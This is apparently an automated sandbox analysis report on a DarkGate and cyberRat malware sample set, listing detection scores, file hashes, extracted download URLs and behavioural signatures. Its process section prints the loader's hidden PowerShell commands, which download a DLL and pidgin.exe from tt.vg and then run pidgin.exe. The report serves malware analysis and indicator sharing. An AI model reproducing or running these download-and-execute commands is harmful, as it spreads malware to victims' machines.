Overview

Sample                  Platform            Score
overview                -                   10
static                  -                   10
apk/cyberR...ws.jar     windows7-x64        1
apk/cyberR...ws.jar     windows10-2004-x64  1
apk/cyberR...x.html     windows7-x64        3
apk/cyberR...x.html     windows10-2004-x64  3
apk/cyberR...x.html     windows7-x64        3
apk/cyberR...x.html     windows10-2004-x64  1
exe/crypte...te.bat     windows7-x64        10
exe/crypte...te.bat     windows10-2004-x64  10
exe/crypte...er.vbs     windows7-x64        10
exe/crypte...er.vbs     windows10-2004-x64  10
exe/crypte...-0.dll     windows7-x64        1
exe/crypte...-0.dll     windows10-2004-x64  1
exe/crypte...e3.exe     windows7-x64        3
exe/crypte...e3.exe     windows10-2004-x64  3
exe/crypte...-0.dll     windows7-x64        3
exe/crypte...-0.dll     windows10-2004-x64  3
exe/crypte...in.exe     windows7-x64        10
exe/crypte...in.exe     windows10-2004-x64  10
exe/crypte...e3.dll     windows7-x64        1
exe/crypte...e3.dll     windows10-2004-x64  1
libssp-0.dll            windows7-x64        3
libssp-0.dll            windows10-2004-x64  3
pidgin.exe              windows7-x64        10
pidgin.exe              windows10-2004-x64  10
sqlite3.dll             windows7-x64        1
sqlite3.dll             windows10-2004-x64  1
exe/non cr...x.html     windows7-x64        3
exe/non cr...x.html     windows10-2004-x64  3
exe/non cr...ed.exe     windows7-x64        10
exe/non cr...ed.exe     windows10-2004-x64  10
exe/non cr...x.html     windows7-x64        3
exe/non cr...x.html     windows10-2004-x64  3

Analysis
max time kernel: 46s
max time network: 52s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 21-08-2024 20:17
Behavioral tasks

behavioral1: apk/cyberRat/Port 7262 sample build/Google News.jar (resource win7-20240705-en)
behavioral2: apk/cyberRat/Port 7262 sample build/Google News.jar (resource win10v2004-20240802-en)
behavioral3: apk/cyberRat/Port 7262 sample build/index.html (resource win7-20240704-en)
behavioral4: apk/cyberRat/Port 7262 sample build/index.html (resource win10v2004-20240802-en)
behavioral5: apk/cyberRat/index.html (resource win7-20240708-en)
behavioral6: apk/cyberRat/index.html (resource win10v2004-20240802-en)
behavioral7: exe/crypted/Dakrgate 5864 startup plus rootkit/Batch file for 5864v dll crypted darkgate/update.bat (resource win7-20240704-en)
behavioral8: exe/crypted/Dakrgate 5864 startup plus rootkit/Batch file for 5864v dll crypted darkgate/update.bat (resource win10v2004-20240802-en)
behavioral9: exe/crypted/Dakrgate 5864 startup plus rootkit/Crypted_with AU3 with startup only with decoded Launcher VBS/launcher.vbs (resource win7-20240729-en)
behavioral10: exe/crypted/Dakrgate 5864 startup plus rootkit/Crypted_with AU3 with startup only with decoded Launcher VBS/launcher.vbs (resource win10v2004-20240802-en)
behavioral11: exe/crypted/Dakrgate 5864 startup plus rootkit/Crypted_with AU3 with startup only with decoded Launcher VBS/libssp-0.dll (resource win7-20240704-en)
behavioral12: exe/crypted/Dakrgate 5864 startup plus rootkit/Crypted_with AU3 with startup only with decoded Launcher VBS/libssp-0.dll (resource win10v2004-20240802-en)
behavioral13: exe/crypted/Dakrgate 5864 startup plus rootkit/Crypted_with AU3 with startup only with decoded Launcher VBS/sqlite3.exe (resource win7-20240708-en)
behavioral14: exe/crypted/Dakrgate 5864 startup plus rootkit/Crypted_with AU3 with startup only with decoded Launcher VBS/sqlite3.exe (resource win10v2004-20240802-en)
behavioral15: exe/crypted/Dakrgate 5864 startup plus rootkit/protected_AU3_cGig/libssp-0.dll (resource win7-20240705-en)
behavioral16: exe/crypted/Dakrgate 5864 startup plus rootkit/protected_AU3_cGig/libssp-0.dll (resource win10v2004-20240802-en)
behavioral17: exe/crypted/Dakrgate 5864 startup plus rootkit/protected_AU3_cGig/pidgin.exe (resource win7-20240704-en)
behavioral18: exe/crypted/Dakrgate 5864 startup plus rootkit/protected_AU3_cGig/pidgin.exe (resource win10v2004-20240802-en)
behavioral19: exe/crypted/Dakrgate 5864 startup plus rootkit/protected_AU3_cGig/sqlite3.dll (resource win7-20240704-en)
behavioral20: exe/crypted/Dakrgate 5864 startup plus rootkit/protected_AU3_cGig/sqlite3.dll (resource win10v2004-20240802-en)
behavioral21: libssp-0.dll (resource win7-20240729-en)
behavioral22: libssp-0.dll (resource win10v2004-20240802-en)
behavioral23: pidgin.exe (resource win7-20240708-en)
behavioral24: pidgin.exe (resource win10v2004-20240802-en)
behavioral25: sqlite3.dll (resource win7-20240705-en)
behavioral26: sqlite3.dll (resource win10v2004-20240802-en)
behavioral27: exe/non crypted/Darkgate 5864 port sample not startup/index.html (resource win7-20240704-en)
behavioral28: exe/non crypted/Darkgate 5864 port sample not startup/index.html (resource win10v2004-20240802-en)
behavioral29: exe/non crypted/Darkgate 5864 port sample not startup/stubbed.exe (resource win7-20240708-en)
behavioral30: exe/non crypted/Darkgate 5864 port sample not startup/stubbed.exe (resource win10v2004-20240802-en)
behavioral31: exe/non crypted/index.html (resource win7-20240704-en)
behavioral32: exe/non crypted/index.html (resource win10v2004-20240802-en)
General

Target: exe/crypted/Dakrgate 5864 startup plus rootkit/Batch file for 5864v dll crypted darkgate/update.bat
Size: 6KB
MD5: 97b7c88a02b2a5214d742b7ed50f4544
SHA1: 15bf7dd44049b94db1a82504802ead45f6186fa0
SHA256: 20c3a5b1c87627e9e016494b806273230f5023cf12d2c0e29eceecb7b8a6d3b6
SHA512: 918c856e61d8b348a705227ec381a8101481ec3aaa4a1f6545b9706ebf491d311cfe716f62ab04c796333bae5df857fc67cac86760be1c67578ca1031a906b25
SSDEEP: 192:GqNFRmxkyzz06ETWtd4pTunJ8ccJkBhKhgQ:Vp2kgzSTWsu6hJEhKht
Malware Config

Extracted URLs:
https://tt.vg/download-update-dll1
https://tt.vg/dlldownload2sqliuit-download
https://tt.vg/download-latest-update
Signatures

Blocklisted process makes network request (7 IoCs)
  flow  pid   Process
  5     2828  powershell.exe
  7     2828  powershell.exe
  8     2828  powershell.exe
  9     2828  powershell.exe
  10    2828  powershell.exe
  11    2828  powershell.exe
  12    2828  powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
  Run Powershell and hide display window.
  pid   Process
  2828  powershell.exe
  2636  powershell.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
  flow  ioc
  4     tt.vg
  5     tt.vg

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   Process
  2828  powershell.exe
  2636  powershell.exe

Suspicious use of AdjustPrivilegeToken (6 IoCs)
  description                        pid   Process
  Token: SeDebugPrivilege            2828  powershell.exe
  Token: SeDebugPrivilege            2636  powershell.exe
  Token: 33                          2820  AUDIODG.EXE
  Token: SeIncBasePriorityPrivilege  2820  AUDIODG.EXE
  Token: 33                          2820  AUDIODG.EXE
  Token: SeIncBasePriorityPrivilege  2820  AUDIODG.EXE

Suspicious use of WriteProcessMemory (6 IoCs)
  description                      pid  Process  procid_target
  PID 560 wrote to memory of 2828  560  cmd.exe  30
  PID 560 wrote to memory of 2828  560  cmd.exe  30
  PID 560 wrote to memory of 2828  560  cmd.exe  30
  PID 560 wrote to memory of 2636  560  cmd.exe  33
  PID 560 wrote to memory of 2636  560  cmd.exe  33
  PID 560 wrote to memory of 2636  560  cmd.exe  33
Processes

C:\Windows\system32\cmd.exe (PID 560)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\exe\crypted\Dakrgate 5864 startup plus rootkit\Batch file for 5864v dll crypted darkgate\update.bat"
  - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2828)
      Command line: powershell.exe -WindowStyle Hidden -Command "& {$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://tt.vg/download-update-dll1', 'C:\Users\Admin\AppData\Local\Temp\libssp-0.dll'); $wc.DownloadFile('https://tt.vg/dlldownload2sqliuit-download', 'C:\Users\Admin\AppData\Local\Temp\sqlite3.dll'); $wc.DownloadFile('https://tt.vg/download-latest-update', 'C:\Users\Admin\AppData\Local\Temp\pidgin.exe')}"
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2636)
      Command line: powershell.exe -WindowStyle Hidden -Command "& {Start-Process 'C:\Users\Admin\AppData\Local\Temp\pidgin.exe' -WindowStyle Hidden}"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

C:\Windows\explorer.exe (PID 2640)
  Command line: "C:\Windows\explorer.exe"

C:\Windows\system32\AUDIODG.EXE (PID 2820)
  Command line: C:\Windows\system32\AUDIODG.EXE 0x440
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 1324193511cba097f81cdf83afc01e31
  SHA1: e0cc68ed16dee7917095ed626fd60f0da58005e5
  SHA256: ae1c754e388a05c11806f230f3d99dc4c9bcc1d37f86eb2d3178a281df998ad1
  SHA512: 61c3cca822377000a7f39281ae16688df1c9b6753a6ed0a9cc662255d23ee60844bbe361bd78a846d472a4b218b22f103fd2b33692f388db3912df3eab728b7d